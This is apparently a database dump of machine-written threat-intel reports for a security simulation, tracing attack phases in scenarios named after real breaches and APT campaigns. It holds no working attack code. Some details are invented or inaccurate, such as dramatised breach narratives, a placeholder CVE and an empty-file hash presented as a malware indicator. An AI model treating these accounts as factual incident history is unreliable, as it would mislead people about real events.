(507, 98, 1015, 2, 'Unveiling Forged Cookie Techniques', '### Overview\nFollowing the detection of suspicious access patterns, further analysis revealed the use of **forged cookies** as a method to bypass authentication controls. These cookies mimic valid session tokens, allowing unauthorized access to user accounts.\n\n### Technical Analysis\n- **Cookie Forging Process:** Attackers reverse-engineered Yahoo\'s cookie generation algorithm to create valid session cookies.\n- **Encryption Key Compromise:** Access to the encryption keys allowed attackers to sign cookies, making them indistinguishable from legitimate ones.\n\n### Implications\nThe use of forged cookies underscores a sophisticated understanding of Yahoo\'s authentication mechanisms, suggesting potential involvement of state-sponsored actors.\n\n### Next Steps\nMonitor for signs of persistence mechanisms as attackers establish long-term access.', '2026-01-17 03:50:17'),
(508, 98, 1016, 3, 'Persistence Mechanisms: Ensuring Long-Term Access', '### Overview\nThe detection of forged cookies has been followed by evidence of **persistence mechanisms** being activated. These mechanisms are designed to maintain access to compromised systems even after initial detection.\n\n### Techniques Identified\n- **Backdoor Installation:** Attackers have installed backdoors on Yahoo\'s servers, allowing remote access at will.\n- **Credential Harvesting:** Compromised credentials are being stored for future use, enabling continued account access.\n\n### Threat Actor Insight\nThese mechanisms suggest a methodical approach typical of state-sponsored groups, who prioritize long-term infiltration.\n\n### Next Steps\nInvestigate potential lateral movement as attackers seek to expand their access to other accounts and systems.', '2026-01-17 03:50:17'),
(509, 98, 1017, 4, 'Lateral Movement: Expanding the Reach', '### Overview\nFollowing the activation of persistence mechanisms, there is now evidence of **lateral movement** across Yahoo accounts and systems. Attackers are leveraging their foothold to access additional resources.\n\n### Tactics Observed\n- **Credential Reuse:** Using harvested credentials to access related accounts and services.\n- **Network Traversal:** Exploiting network vulnerabilities to move between systems within Yahoo\'s infrastructure.\n\n### Analysis\nThis phase indicates a concerted effort to maximize data access and exfiltration potential, likely with the aim of conducting a massive data breach.\n\n### Next Steps\nPrepare for possible data exfiltration efforts as attackers reach their objectives.', '2026-01-17 03:50:17'),
(510, 98, 1018, 5, 'Massive Data Exfiltration: The Breach Unfolds', '### Overview\nThe operation has culminated in a **massive data exfiltration** event, affecting billions of Yahoo accounts. Attackers have successfully extracted vast quantities of user data.\n\n### Methods of Exfiltration\n- **Encrypted Channel Use:** Data was transferred out using encrypted channels, minimizing detection by standard monitoring tools.\n- **Batch Processing:** Data was exfiltrated in small batches over time to evade detection thresholds.\n\n### Impact Assessment\nThe scale of this data breach is unprecedented, with implications for billions of users worldwide. The involvement of state-sponsored actors is strongly indicated.\n\n### Conclusion\nImmediate efforts should focus on containment, mitigation, and user notification, along with a comprehensive review of security protocols to prevent future incidents.', '2026-01-17 03:50:17'),
(511, 99, 1019, 1, 'Unusual Data Extraction Patterns Uncovered', '### Context\nAfter detecting unauthorized API access, further analysis revealed unusual data extraction patterns consistent with data exfiltration techniques. The Data Brokers APT group appears to be executing high-frequency API calls indicative of automated data harvesting.\n\n### Key Findings\n- **High-Frequency Requests:** Patterns indicate a spike in API requests, particularly targeting user profile endpoints.\n- **Automated Scripts:** Utilization of scripts to automate data collection, bypassing standard rate limits.\n- **Data Volume:** Approximately 700 million profiles are estimated to be targeted.\n\n### Next Steps\nMonitoring for persistence techniques such as API key rotation to sustain data extraction without interruption.', '2026-01-17 03:50:48'),
(512, 99, 1020, 2, 'Persistence Techniques via API Key Rotation', '### Context\nFollowing the discovery of unusual data extraction patterns, it has become evident that the Data Brokers APT group is employing persistence techniques to maintain access.\n\n### Key Findings\n- **API Key Rotation:** Frequent changes in API keys were observed, suggesting attempts to evade detection and rate limiting.\n- **Redundancy Mechanisms:** Backup keys and multiple accounts are utilized to ensure continuous access.\n- **Adaptive Techniques:** Rapid adaptation to API changes and security enhancements.\n\n### Next Steps\nInvestigate potential lateral movement to other data sources to expand the scope of data access.', '2026-01-17 03:50:48'),
(513, 99, 1021, 3, 'Lateral Movement to Additional Data Sources', '### Context\nIn the wake of persistent API key rotation, there is evidence that the Data Brokers APT group is expanding its reach through lateral movement to additional data sources.\n\n### Key Findings\n- **Target Expansion:** Attempts identified to access other platforms with similar data profiles, including social media and professional networking sites.\n- **Credential Reuse:** Suspected use of credentials obtained from initial LinkedIn breach to gain access to other services.\n- **Cross-Platform Threats:** The potential for cross-platform data correlation enhances the risk profile.\n\n### Next Steps\nAssess the risk of aggregated data exploitation and develop mitigation strategies.', '2026-01-17 03:50:48'),
(514, 99, 1022, 4, 'Aggregated Data Exploitation Risk Analysis', '### Context\nWith evidence of lateral movement to other platforms, the risk of aggregated data exploitation by the Data Brokers APT group is heightened.\n\n### Key Findings\n- **Data Correlation:** Aggregated data from multiple sources increases the precision of personal and professional profiling.\n- **Identity Threats:** Enhanced risk of identity theft and spear-phishing attacks.\n- **Market Manipulation:** Potential for exploiting professional data for insider trading or competitive intelligence.\n\n### Recommendations\nImplement immediate countermeasures, including improved access controls, anomaly detection systems, and cross-platform data sharing agreements to mitigate risks.', '2026-01-17 03:50:48'),
(515, 99, 1023, 5, NULL, NULL, '2026-01-17 03:50:48'),
(516, 102, 1044, 1, 'Analysis of Malicious Script Execution in API Interactions', '### Background\nAfter the initial detection of suspicious activity in the Contact Importer, our team has observed unauthorized script executions interacting with Facebook\'s APIs.\n\n### Key Findings\n- **Script Origin**: The scripts originate from multiple IP addresses, primarily located in Eastern Europe.\n- **API Calls**: The scripts are making repetitive API calls to the Contact Importer function, indicating attempts to exploit the vulnerability further.\n- **Obfuscation Techniques**: Code analysis reveals the use of obfuscation methods to conceal malicious activity.\n\n### Recommendations\n- Immediate review and patching of API endpoints to prevent further exploitation.\n- Implement rate limiting and additional verification steps for API interactions.\n\n### Next Steps\nPrepare for potential credential stuffing activities, as compromised data could be used to gain persistent access.', '2026-01-24 00:10:54'),
(517, 102, 1045, 2, 'Credential Stuffing and Persistence Tactics', '### Background\nFollowing the execution of malicious scripts, there is evidence of credential stuffing attempts aimed at maintaining persistent access to user accounts.\n\n### Key Findings\n- **Credential Sources**: Compromised credentials are being sourced from previous data breaches, indicating a coordinated effort to exploit known vulnerabilities.\n- **Automation**: The attackers are utilizing automated tools to test combinations of usernames and passwords across multiple accounts.\n- **Persistence**: Once access is gained, attackers are setting up secondary authentication methods to ensure prolonged account control.\n\n### Recommendations\n- Encourage users to enable two-factor authentication.\n- Monitor login attempts for unusual patterns indicative of automated credential stuffing.\n\n### Next Steps\nInvestigate potential lateral movement as attackers may leverage compromised accounts to gain access to additional data.', '2026-01-24 00:10:54'),
(518, 102, 1046, 3, 'Lateral Movement through Compromised Accounts', '### Background\nWith persistent access achieved, attackers are now moving laterally within Facebook\'s network using compromised accounts.\n\n### Key Findings\n- **Account Compromise**: Analysis shows coordinated efforts to access privileged accounts, potentially targeting administrative or high-profile user data.\n- **Internal Network Mapping**: Attackers are using compromised accounts to reconnoiter the internal network, searching for valuable data or vulnerable systems.\n- **Escalation Attempts**: There are signs of attempts to escalate privileges within the network environment.\n\n### Recommendations\n- Conduct a full audit of account access logs to identify unusual access patterns.\n- Implement stricter access controls for sensitive internal resources.\n\n### Next Steps\nPrepare for potential data exfiltration activities, as attackers may be positioning themselves to extract large volumes of user data.', '2026-01-24 00:10:54'),
(519, 102, 1047, 4, 'Exfiltration of User Data', '### Background\nFollowing lateral movement, there is confirmed exfiltration of user data, affecting over 533 million Facebook accounts.\n\n### Key Findings\n- **Data Volume**: Large volumes of user data have been transferred to external servers, indicating a mass exfiltration event.\n- **Data Types**: The exfiltrated data includes personal information such as phone numbers, email addresses, and other sensitive PII.\n- **Transfer Methods**: Data was exfiltrated using encrypted channels to prevent detection during transfer.\n\n### Recommendations\n- Notify affected users and advise on steps to protect their personal information.\n- Collaborate with law enforcement and cybersecurity experts to track and mitigate the impact of the breach.\n\n### Conclusion\nThe investigation has highlighted critical vulnerabilities that need immediate addressing to prevent future incidents. Continuous monitoring and enhanced security protocols are essential to safeguard user data.', '2026-01-24 00:10:54'),
(520, 102, 1048, 5, NULL, NULL, '2026-01-24 00:10:54'),
(521, 103, 1049, 1, 'Analysis of Initial Access: Unusual Traffic Patterns', '## Overview\nFollowing the detection of unusual traffic on Twitch\'s servers, an in-depth analysis was conducted to identify potential entry points. The traffic spike corresponds to a period during which multiple unauthorized IP addresses attempted to communicate with Twitch\'s backend systems.\n\n## Key Findings\n- **IP Analysis**: Several IP addresses were flagged, originating from known VPN services and anonymization networks.\n- **Entry Points**: Initial access appears to have been gained through a misconfigured API endpoint, allowing unauthorized queries.\n- **Behavioral Patterns**: The traffic engaged in high-frequency requests, consistent with automated scripts or botnet activity.\n\n## Next Steps\nMonitoring has been intensified, focusing on identifying any further unauthorized access attempts. Enhanced logging and anomaly detection mechanisms are being deployed to anticipate potential execution of malicious scripts.', '2026-01-24 00:33:47'),
(522, 103, 1050, 2, 'Execution Phase: Malicious Script Activity Detected', '## Overview\nPost-initial access, malicious scripts were activated within Twitch\'s server environment. These scripts appear to have been custom-developed for the environment, indicating a high level of expertise from the attackers.\n\n## Key Findings\n- **Script Characteristics**: The scripts executed were obfuscated, employing advanced techniques to avoid detection by standard security tools.\n- **Targeted Functions**: The scripts primarily targeted data retrieval functions, particularly those related to user and financial records.\n- **Indicators of Compromise (IoCs)**: Several new IoCs were identified, including file hashes and common command-line arguments used by the scripts.\n\n## Next Steps\nEfforts are underway to neutralize the scripts and patch the vulnerabilities exploited. Analysts are working to establish the persistence mechanisms employed by the attackers to maintain access.', '2026-01-24 00:33:47'),
(523, 103, 1051, 3, 'Persistence Mechanisms: Maintaining Unauthorized Access', '## Overview\nInvestigation into the persistence mechanisms used by the attackers revealed sophisticated strategies aimed at maintaining long-term access to critical systems.\n\n## Key Findings\n- **Backdoor Implementation**: Custom backdoors were installed on several servers, providing remote access even after reboots.\n- **Credential Dumping**: Tools were used to extract credentials, enabling the attackers to create new accounts with elevated privileges.\n- **Scheduled Tasks**: Persistent scripts were scheduled to run at regular intervals, ensuring continued access and data collection.\n\n## Next Steps\nImmediate actions include dismantling the persistence mechanisms and revising user access policies. Focus is now shifting towards identifying lateral movement attempts that may have compromised additional systems.', '2026-01-24 00:33:47'),
(524, 103, 1052, 4, 'Lateral Movement and Data Exfiltration: Comprehensive Breach Overview', '## Overview\nThe attackers successfully moved laterally across Twitch\'s network, accessing multiple systems and databases. This movement facilitated a large-scale data exfiltration.\n\n## Key Findings\n- **Compromised Systems**: Key systems, including user databases and financial records, were accessed during the lateral movement phase.\n- **Data Exfiltration**: A significant volume of data, including source code and earnings reports, was exfiltrated using encrypted channels to evade detection.\n- **Tactics, Techniques, and Procedures (TTPs)**: The use of legitimate administrative tools to blend with normal traffic was noted, making detection challenging.\n\n## Next Steps\nA comprehensive review of data loss is underway, assessing the impact on operations and user privacy. Strengthening network segmentation and data loss prevention measures are top priorities. The focus now shifts to implementing robust incident response strategies and preparing public communication plans to address potential fallout.', '2026-01-24 00:33:47'),
(525, 103, 1053, 5, NULL, NULL, '2026-01-24 00:33:47'),
(526, 104, 1054, 1, 'Investigation into Unauthorized Login Attempt', '### Summary\nFollowing the detection of an unauthorized login attempt, initial assessments indicate that threat actors may have utilized compromised credentials obtained through **phishing campaigns**. These campaigns were likely targeted at GoDaddy employees, exploiting human vulnerabilities for credential theft.\n\n### Next Steps\n- **Monitor network logs** for further unauthorized access attempts.\n- **Reset affected user credentials** and enforce stricter authentication protocols.\n- Prepare for potential **sFTP activity**, as attackers may attempt to execute data manipulation or transfer operations.', '2026-01-24 00:38:07'),
(527, 104, 1055, 2, 'Analysis of Suspicious sFTP Activity', '### Summary\nSuspicious sFTP activity has been identified, potentially linked to the earlier unauthorized login attempt. This activity suggests that attackers are attempting to execute malicious scripts or transfer sensitive data.\n\n### Observations\n- Unusual file transfer patterns were detected, indicating possible data staging for exfiltration.\n- Potential use of automated scripts to facilitate data manipulation.\n\n### Next Steps\n- **Isolate affected systems** to contain potential data breaches.\n- **Deploy security patches** to address vulnerabilities in sFTP services.\n- Prepare for possible establishment of a **persistent backdoor** by the attackers, allowing them to maintain access.', '2026-01-24 00:38:07'),
(528, 104, 1056, 3, 'Detection of Persistent Backdoor', '### Summary\nA persistent backdoor has been established by the threat actors, allowing them ongoing access to compromised systems. This backdoor is likely a result of prior suspicious sFTP activity.\n\n### Technical Details\n- Backdoor appears to be a custom-built malware, designed to evade standard detection mechanisms.\n- Command and control (C&C) communication channels identified, indicating ongoing coordination with external servers.\n\n### Next Steps\n- **Conduct a comprehensive malware analysis** to understand the backdoor\'s functionality and remove it.\n- **Enhance network monitoring** to detect unusual outbound traffic indicative of lateral movement attempts.\n- Implement **network segmentation** to limit potential lateral movement within the organization.', '2026-01-24 00:38:07'),
(529, 104, 1057, 4, 'Lateral Movement within Network Detected', '### Summary\nLateral movement has been detected within the GoDaddy network, suggesting attackers are expanding their reach across different systems. This activity is consistent with efforts to identify and access high-value assets.\n\n### Observations\n- Use of compromised credentials and exploited vulnerabilities to navigate laterally.\n- Access attempts to administrative and financial systems observed.\n\n### Next Steps\n- **Strengthen access controls** and review user privileges across the network.\n- **Deploy endpoint detection and response (EDR) solutions** to identify and mitigate lateral movement threats.\n- Prepare for potential **SSL private key theft**, as attackers may target encrypted communications for sensitive data.', '2026-01-24 00:38:07'),
(530, 104, 1058, 5, NULL, NULL, '2026-01-24 00:38:07'),
(531, 105, 1059, 1, NULL, NULL, '2026-01-24 03:32:45'),
(532, 105, 1060, 2, 'Web Shell Deployment Analysis', '### Web Shell Deployment Analysis\n\nFollowing the initial access via CVE-2021-26855, our systems have detected the deployment of a web shell, a common tactic for establishing persistence. This activity suggests the adversary is setting up a mechanism to maintain access to the compromised Exchange server.\n\n#### Key Findings:\n- **Location**: The web shell was deployed in the `/owa/auth` directory, a known vector for Hafnium operations.\n- **File Signature**: The web shell file is obfuscated, consistent with previously observed Hafnium tactics.\n- **Time of Deployment**: Occurred shortly after the initial access, indicating a pre-scripted procedure.\n\n#### Recommendations:\n- Conduct a thorough file system analysis to identify and remove unauthorized files.\n- Implement additional monitoring on the affected server for unusual activity.\n\nThe next phase of the attack may involve attempts to move laterally within the network, leveraging the established persistence.', '2026-01-24 03:32:45'),
(533, 105, 1061, 3, 'Lateral Movement Threat Assessment', '### Lateral Movement Threat Assessment\n\nWith the web shell in place, the threat actor is attempting lateral movement. This phase is critical as the adversary could potentially access sensitive data or compromise additional systems.\n\n#### Observations:\n- **Techniques Used**: The attacker appears to be using compromised credentials and leveraging Windows Management Instrumentation (WMI) for lateral movement.\n- **Targets**: Initial attempts are targeting systems within the same domain, focusing on accounts with elevated privileges.\n\n#### Indicators of Compromise (IOCs):\n- Unauthorized login attempts from the Exchange server IP to other domain systems.\n- Increased network traffic related to WMI commands.\n\n#### Mitigation Strategies:\n- Immediately isolate the affected systems to prevent further spread.\n- Reset all passwords for accounts with elevated privileges.\n- Enhance network segmentation to limit lateral movement capabilities.\n\nFurther monitoring and analysis are essential to understand the full scope of the threat and ensure comprehensive remediation.', '2026-01-24 03:32:45'),
(534, 106, 1062, 1, 'Analysis of Suspicious iMessage Activity', '### Suspicious iMessage Activity Detected\n\nFollowing the detection of suspicious iMessage activity, further analysis is required to confirm the presence of Pegasus spyware. Indicators of compromise (IOCs) should be examined, focusing on the potential entry points and the characteristics of the messages involved.\n\n#### Key Indicators:\n- Unsolicited messages from unknown contacts.\n- Messages containing links or attachments that automatically execute.\n\n#### Next Steps:\n- Initiate a detailed forensic examination of the affected devices.\n- Monitor for indicators of the FORCEDENTRY vulnerability being exploited.', '2026-01-24 03:33:29'),
(535, 106, 1063, 2, 'FORCEDENTRY Vulnerability Exploitation Analysis', '### Exploitation of FORCEDENTRY Vulnerability\n\nThe exploitation of the FORCEDENTRY vulnerability signifies a critical stage in the deployment of Pegasus spyware. This zero-click exploit allows attackers to gain execution capabilities on the target device without user interaction.\n\n#### Key Points of Exploitation:\n- Utilizes crafted PDF or GIF files sent via iMessage.\n- Bypasses traditional security measures through memory corruption techniques.\n\n#### Recommendations:\n- Patch devices with the latest security updates.\n- Continuously monitor for signs of persistence mechanisms being established on the device.', '2026-01-24 03:33:29'),
(536, 106, 1064, 3, 'Persistence Mechanism Investigation', '### Identification of Persistence Mechanisms\n\nThe detection of persistence mechanisms is a crucial phase, ensuring the spyware remains active on the device. Typical methods include modifying system files or leveraging legitimate services.\n\n#### Observed Techniques:\n- Installation of malicious profiles or certificates.\n- Alteration of system settings to ensure continuous access.\n\n#### Actionable Intelligence:\n- Conduct a comprehensive audit of system settings and installed profiles.\n- Prepare for potential data exfiltration activities by monitoring network traffic anomalies.', '2026-01-24 03:33:29'),
(537, 106, 1065, 4, NULL, NULL, '2026-01-24 03:33:29'),
(538, 107, 1066, 1, 'Analysis of Initial Access Vector', '### Overview\nAfter the detection of the suspicious email phishing campaign, further analysis reveals that the phishing emails deployed by **APT1** have been crafted using social engineering techniques targeting employees in sensitive roles across various sectors.\n\n### Tactics\n- **Spear Phishing**: Emails are personalized, appearing to originate from trusted sources within the victim\'s organization.\n- **Payloads**: Emails contain links to malicious sites or attachments designed to exploit vulnerabilities.\n\n### Recommendations\n- Enhance email filtering and monitoring systems.\n- Conduct employee awareness training on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential **Remote Code Execution** as APT1 is known to leverage malicious attachments, such as PDFs, to gain execution within target networks.', '2026-01-24 03:35:49'),
(539, 107, 1067, 2, 'Malicious PDF Attack Vector Analysis', '### Overview\nFollowing the remote code execution via malicious PDFs, analysis indicates that **APT1** employs sophisticated PDF exploits targeting vulnerabilities in outdated PDF readers.\n\n### Tactics\n- **Exploitation**: PDFs are designed to exploit specific vulnerabilities (e.g., CVE-XXXX-XXXX).\n- **Payload Delivery**: Upon execution, the payload establishes initial foothold and downloads additional malware.\n\n### Recommendations\n- Ensure all PDF reader software is updated to the latest versions.\n- Implement strict file type restrictions and scanning protocols on email attachments.\n\n### Next Steps\nMonitor for **Persistence** mechanisms, as APT1 often alters system registries to maintain access.', '2026-01-24 03:35:49'),
(540, 107, 1068, 3, 'Persistence Mechanisms in APT1 Operations', '### Overview\nPersistence has been achieved through registry modification, a common tactic used by **APT1** to maintain long-term access to compromised systems.\n\n### Tactics\n- **Registry Changes**: Modifications are made to ensure malware execution upon system startup.\n- **Stealth Techniques**: Changes are often subtle and blended with legitimate entries to avoid detection.\n\n### Recommendations\n- Regularly audit and compare registry entries against known baselines.\n- Deploy tools that can detect unauthorized registry modifications.\n\n### Next Steps\nFocus on detecting **Credential Dumping** activities, as APT1 looks to escalate privileges and move laterally within the network.', '2026-01-24 03:35:49'),
(541, 107, 1069, 4, 'Credential Dumping and Lateral Movement Analysis', '### Overview\nCredential dumping detected within the network, indicates **APT1**\'s attempt to escalate privileges and move laterally.\n\n### Tactics\n- **Tools Utilized**: Common tools include Mimikatz and custom scripts designed to extract credentials from memory.\n- **Targeted Accounts**: Focus on accounts with administrative privileges.\n\n### Recommendations\n- Implement multi-factor authentication for all sensitive accounts.\n- Regularly rotate and monitor privileged account credentials.\n\n### Next Steps\nPrepare for potential **Data Exfiltration**, as APT1 typically uses encrypted channels to exfiltrate data from compromised networks.', '2026-01-24 03:35:49'),
(542, 107, 1070, 5, NULL, NULL, '2026-01-24 03:35:49'),
(543, 108, 1071, 1, 'Analysis of Unusual Network Traffic', '### Overview\nFollowing the detection of unusual network traffic, a detailed packet analysis was conducted. The traffic was traced back to a compromised endpoint within the corporate network.\n\n### Key Findings\n- **Source IP:** 192.168.1.105\n- **Destination IP:** External IP linked to a known Command and Control (C2) server.\n- **Traffic Pattern:** High-frequency connections at irregular intervals suggest automated data exfiltration attempts.\n\n### Next Steps\n- Enhanced endpoint monitoring is recommended to detect any suspicious file executions that could indicate the execution stage of the malware lifecycle.', '2026-01-24 03:35:57'),
(544, 108, 1072, 2, 'Investigation of Suspicious File Execution', '### Overview\nSuspicious file execution was identified on the compromised endpoint, correlating with the initial network traffic alert.\n\n### Key Findings\n- **Executed File:** `malware_loader.exe`\n- **Execution Path:** C:\\Users\\Public\\Downloads\n- **Behavior:** The file attempts to reach out to multiple C2 servers, suggesting an attempt to download additional payloads.\n\n### Next Steps\n- Conduct a forensic analysis to determine any changes in the file system, which may indicate persistence mechanisms being deployed.', '2026-01-24 03:35:57'),
(545, 108, 1073, 3, 'Detection of Encrypted File System', '### Overview\nThe investigation revealed that the malware has encrypted certain files on the affected endpoint, an indication of persistence.\n\n### Key Findings\n- **Encryption Method:** AES-256\n- **Affected Files:** System configuration files and user data\n- **Persistence Mechanism:** Registry keys modified to execute malware at startup\n\n### Next Steps\n- Initiate containment procedures and prepare to intercept any attempts of lateral movement to other network segments.', '2026-01-24 03:35:57'),
(546, 108, 1074, 4, 'Lateral Movement Attempt Analysis', '### Overview\nAn attempt to move laterally within the network was observed, leveraging compromised credentials.\n\n### Key Findings\n- **Compromised Account:** `admin_user@example.com`\n- **Movement Path:** Targeted access to file servers and sensitive databases\n- **Technique Used:** Pass-the-Hash attack\n\n### Next Steps\n- Monitor for data exfiltration activities and secure sensitive data stores to prevent unauthorized access.', '2026-01-24 03:35:57'),
(547, 108, 1075, 5, NULL, NULL, '2026-01-24 03:35:57'),
(548, 109, 1076, 1, 'Deep Dive into the Phishing Attempt', '### Context on Phishing Attempt\n\nAfter the initial alert regarding a suspicious email, further analysis reveals that the email originated from a compromised server located in Eastern Europe. The email contained a malicious attachment disguised as a PDF file titled \'Quarterly ICS Update.\'\n\n### Key Indicators\n- **Sender Domain**: [compromisedvendor.org]\n- **Attachment Hash**: `d41d8cd98f00b204e9800998ecf8427e`\n- **Subject Line**: `Urgent: Review Required`\n\n### Recommendations\n- Implement advanced email filtering rules.\n- Conduct awareness training focusing on identifying phishing attempts.\n\n### Next Steps\nPrepare for potential execution of malware as the initial access vector has been planted.', '2026-01-24 03:36:35'),
(549, 109, 1077, 2, 'Reconnaissance Malware Analysis', '### Execution and Reconnaissance Insights\n\nFollowing the execution alert, it is confirmed that a reconnaissance malware has been executed on the target system. This malware, identified as a variant of the \'Duqu 2.0\' strain, is known for its stealth and modular architecture.\n\n### Technical Details\n- **Malware Type**: Reconnaissance\n- **File Name**: `sysmon.exe`\n- **Command and Control (C2) Server**: `185.92.220.48`\n\n### Objectives\nThe primary goal is to map the organization\'s ICS network and identify critical assets.\n\n### Mitigation Strategies\n- Monitor network traffic for connections to known C2 servers.\n- Isolate infected systems and perform a thorough forensic analysis.\n\n### Next Steps\nBe vigilant for persistence mechanisms that may be installed following reconnaissance.', '2026-01-24 03:36:35'),
(550, 109, 1078, 3, 'Persistence Mechanisms Identified', '### Persistence via Backdoor Installation\n\nPost-reconnaissance, it has been established that a sophisticated backdoor, likely derived from the Equation Group\'s \'Double Fantasy\' malware, has been installed to maintain persistent access.\n\n### Features of the Backdoor\n- **Installation Method**: Leveraged privilege escalation vulnerabilities in ICS software.\n- **Backdoor Name**: `doublefantasy.dll`\n- **Communication**: Utilizes HTTPS for encrypted communications with C2.\n\n### Recommendations\n- Apply patches to all vulnerable ICS software.\n- Enhance monitoring for unusual outbound HTTPS traffic.\n\n### Next Steps\nPrepare for potential lateral movement attempts exploiting ICS protocols.', '2026-01-24 03:36:35'),
(551, 109, 1079, 4, 'Lateral Movement Detected', '### Exploitation of ICS Protocols\n\nFollowing the persistence phase, the adversary has initiated lateral movement within the ICS network. They are exploiting specific ICS protocols to move undetected between systems.\n\n### Details of Exploitation\n- **Exploited Protocols**: OPC UA, Modbus\n- **Affected Systems**: SCADA controllers and PLCs\n- **Lateral Movement Technique**: Credential dumping and pass-the-hash\n\n### Defensive Measures\n- Segregate ICS from corporate networks using firewalls.\n- Regularly update and patch ICS components.\n\n### Next Steps\nFocus on identifying and mitigating data exfiltration attempts.', '2026-01-24 03:36:35'),
(552, 109, 1080, 5, NULL, NULL, '2026-01-24 03:36:35');
INSERT INTO `operation_alerts` (`id`, `operation_id`, `alert_id`, `sequence_order`, `intel_report_title`, `intel_report_content`, `created_at`) VALUES
(553, 110, 1081, 1, 'Analysis of Spear-Phishing Techniques', '### Overview\nThe initial access vector utilized by The Mask\'s Careto campaign is spear-phishing emails. These emails contain malicious attachments designed to look like legitimate documents.\n\n### Key Findings\n- **Targeted Individuals**: High-ranking government officials.\n- **Email Characteristics**: Often mimics internal government communications, increasing the likelihood of the target opening the attachment.\n- **Attachment Type**: Commonly uses office document formats with embedded macros.\n\n### Next Steps\nInvestigate the execution of malicious scripts triggered by these attachments to understand the malware\'s behavior post-initial access.', '2026-01-24 03:40:42'),
(554, 110, 1082, 2, 'Malicious Script Execution Tactics', '### Overview\nOnce the malicious attachment is opened, it executes scripts that deploy the Careto malware onto the victim\'s system.\n\n### Key Findings\n- **Script Languages**: Primarily uses PowerShell and VBScript to maintain compatibility across systems.\n- **Obfuscation Techniques**: The scripts are heavily obfuscated to avoid detection by traditional antivirus solutions.\n\n### Next Steps\nFocus on understanding how these scripts establish persistence mechanisms to maintain long-term access to compromised systems.', '2026-01-24 03:40:42'),
(555, 110, 1083, 3, 'Persistence Mechanisms of Careto Malware', '### Overview\nThe Careto malware employs sophisticated persistence mechanisms to ensure it remains active on infected systems.\n\n### Key Findings\n- **Techniques Used**: Modifications to the Windows Registry and creation of scheduled tasks.\n- **Survivability**: Designed to survive system reboots and updates.\n\n### Next Steps\nInvestigate how Careto conducts credential dumping to facilitate lateral movement within the targeted network.', '2026-01-24 03:40:42'),
(556, 110, 1084, 4, 'Credential Dumping and Lateral Movement', '### Overview\nAfter establishing persistence, Careto focuses on credential dumping to move laterally within the network.\n\n### Key Findings\n- **Tools Employed**: Utilizes open-source tools like Mimikatz for credential extraction.\n- **Lateral Movement**: Exploits valid accounts to access additional network resources.\n\n### Next Steps\nExamine the methods used for data exfiltration, particularly how Careto uses encrypted channels to avoid detection.', '2026-01-24 03:40:42'),
(557, 110, 1085, 5, NULL, NULL, '2026-01-24 03:40:42'),
(558, 111, 1086, 1, 'Analysis of Phishing Techniques in Operation Machete', '## Overview\nThe initial stage of Operation Machete involves a sophisticated phishing campaign. The attackers utilize spear-phishing emails, targeting military and government officials in Venezuela, Ecuador, and Colombia.\n\n## Phishing Email Characteristics\n- **Subject Lines**: Mimic official government communications\n- **Attachments**: Include malicious documents disguised as official reports\n\n## Next Steps\nThe successful execution of these phishing techniques leads to the deployment of a Python-based Remote Access Trojan (RAT) on compromised systems.', '2026-01-24 03:41:05'),
(559, 111, 1087, 2, 'Unveiling the Python-Based RAT in Operation Machete', '## Overview\nFollowing successful phishing attempts, the attackers deploy a Python-based Remote Access Trojan (RAT) to infiltrate target systems.\n\n## RAT Capabilities\n- **Remote Command Execution**: Allows attackers to execute commands on the compromised host\n- **Data Collection**: Gathers system information and user activity\n\n## Implications\nThe execution of this RAT sets the stage for establishing persistence mechanisms, ensuring continued access to the compromised systems.', '2026-01-24 03:41:05'),
(560, 111, 1088, 3, 'Persistence Mechanisms: Scheduled Tasks in Operation Machete', '## Overview\nTo maintain long-term access to compromised systems, Operation Machete employs persistence mechanisms such as scheduled tasks.\n\n## Persistence Techniques\n- **Scheduled Tasks**: Automatically execute the RAT at specific intervals\n- **Startup Modifications**: Ensures RAT runs upon system boot\n\n## Next Phase\nWith persistence established, attackers focus on credential harvesting and lateral movement within the network.', '2026-01-24 03:41:05'),
(561, 111, 1089, 4, 'Credential Harvesting and Lateral Movement in Operation Machete', '## Overview\nOperation Machete progresses to credential harvesting and lateral movement, expanding their foothold within the target networks.\n\n## Techniques Used\n- **Credential Dumping**: Extracts passwords and hashes from compromised systems\n- **Lateral Movement**: Exploits harvested credentials to access additional systems\n\n## Strategic Goal\nThese actions set the stage for the final phase: data exfiltration via encrypted channels, allowing attackers to extract valuable intelligence.', '2026-01-24 03:41:05'),
(562, 111, 1090, 5, NULL, NULL, '2026-01-24 03:41:05'),
(563, 112, 1091, 1, 'Investigation into Suspicious Email Attachment', '# Investigation into Suspicious Email Attachment\n\n## Overview\nFollowing the detection of a suspicious email attachment potentially associated with a phishing attempt, an in-depth analysis was conducted on the email and its attachment.\n\n## Key Findings\n- **Sender Analysis**: The email originated from a domain closely resembling a known financial services partner, indicating potential domain spoofing.\n- **Attachment Details**: The attached file was a Microsoft Word document containing malicious macros designed to execute scripts upon opening.\n- **Target**: The email was sent to multiple employees within the finance department, suggesting a targeted spear-phishing campaign.\n\n## Recommendations\n- Immediate removal of the email from all recipient inboxes.\n- Conduct an organization-wide phishing awareness training.\n- Implement advanced email filtering to detect similar threats in the future.\n\n## Next Steps\nMonitor for any **Unauthorized PowerShell Execution**, which could indicate further compromise following this phishing attempt.', '2026-01-25 20:00:09'),
(564, 112, 1092, 2, 'Unauthorized PowerShell Execution Detected', '# Unauthorized PowerShell Execution Detected\n\n## Overview\nFollowing the suspicious email attachment, unauthorized PowerShell activity was detected, indicating a potential command and control attempt by the Poseidon Group.\n\n## Key Findings\n- **Execution Context**: The PowerShell script was executed under a user account belonging to the finance department, consistent with the targets of the prior phishing attempt.\n- **Commands Executed**: The script attempted to connect to a remote server using encoded commands, likely for data exfiltration or further payload deployment.\n- **Indicators of Compromise (IOCs)**: Unusual network connections to IP addresses associated with known threat actors.\n\n## Recommendations\n- Immediate isolation of the affected systems from the network.\n- Conduct a full forensic analysis to trace the extent of the compromise.\n- Update firewall rules to block known malicious IPs.\n\n## Next Steps\nPrepare for potential **Data Exfiltration Attempt through Unusual Network Traffic**, as this is a common follow-up tactic in extortion-driven attacks.', '2026-01-25 20:00:09'),
(565, 112, 1093, 3, NULL, NULL, '2026-01-25 20:00:09'),
